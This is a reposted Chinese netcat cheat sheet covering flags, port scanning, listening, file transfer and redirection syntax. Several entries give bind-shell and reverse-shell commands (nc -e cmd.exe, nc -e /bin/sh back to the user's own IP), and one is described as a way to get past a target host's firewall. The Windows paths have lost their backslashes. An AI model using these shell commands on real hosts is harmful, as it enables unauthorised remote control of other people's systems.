NC瑞士军刀

Posted h4ck3r-xix

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NC瑞士军刀相关的知识,希望对你有一定的参考价值。

NetCat参数说明:

-c shell commands as `-e’; use /bin/sh to exec

-e filename program to exec after connect

-d 后台模式

-i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;

-l 监听模式,用于入站连接

-h 查看帮助信息

-L 监听模式,连接关闭后仍然继续监听,直到CTR+C

-n IP地址,不能用域名

-o <文件名> 记录16进制的传输

-p <端口> 本地端口号

-r 随机本地及远程端口

-s <地址> 设置本地主机送出数据包的IP地址

-t 使用Telnet交互方式

-T tos set Type Of Service

-u UDP模式

-v 详细输出,用-vv将更详细

-w <数字> timeout延时间隔

-z 将输入,输出关掉(用于扫锚时)

基本用法:

  • 连接到192.168.0.1主机的80端口

    nc -nvv 192.168.0.1 80
  • 开启本机的TCP 80端口并监听

    nc -l -p 80 
  • 扫锚192.168.0.1的80-1024端口

    nc -nvv -w2 -z 192.168.0.1 80-1024
  • 绑定remote主机的cmdshell在remote的TCP 5354端口

    nc -l -p 5354 -t -e c:winntsystem32cmd.exe
  • 绑定remote主机的cmdshell并反向连接192.168.0.2的5354端口

    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354

高级用法:

  • 开启并不停地监听80端口,直到CTR+C为止

    nc -L -p 80 
  • 开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt

    nc -L -p 80 > c:log.txt 作为蜜罐用2
  • 开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

    nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1
  • 开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2
  • 开启并不停地监听本机端口,直到CTR+C为止

    nc -l -p 本机端口 
  • 在对方 win2000+主机上用:

    nc -e cmd.exe 本机IP -p 本机端口
  • linux,unix上,反向连接突破对方主机的防火墙

    nc -e /bin/sh 本机IP -p 本机端口 
  • 本机上用

    nc -d -l -p 本机端口 < 要传送的文件路径及名称 
  • 在对方主机上用

    nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 

备 注:

| 管道命令

< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令

@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中

与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。

如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

以上是关于NC瑞士军刀的主要内容,如果未能解决你的问题,请参考以下文章

nc一把瑞士军刀

nc一把瑞士军刀

nc一把瑞士军刀

nc,nmap学习瑞士军刀

NC瑞士军刀

Kali-nc(瑞士军刀)使用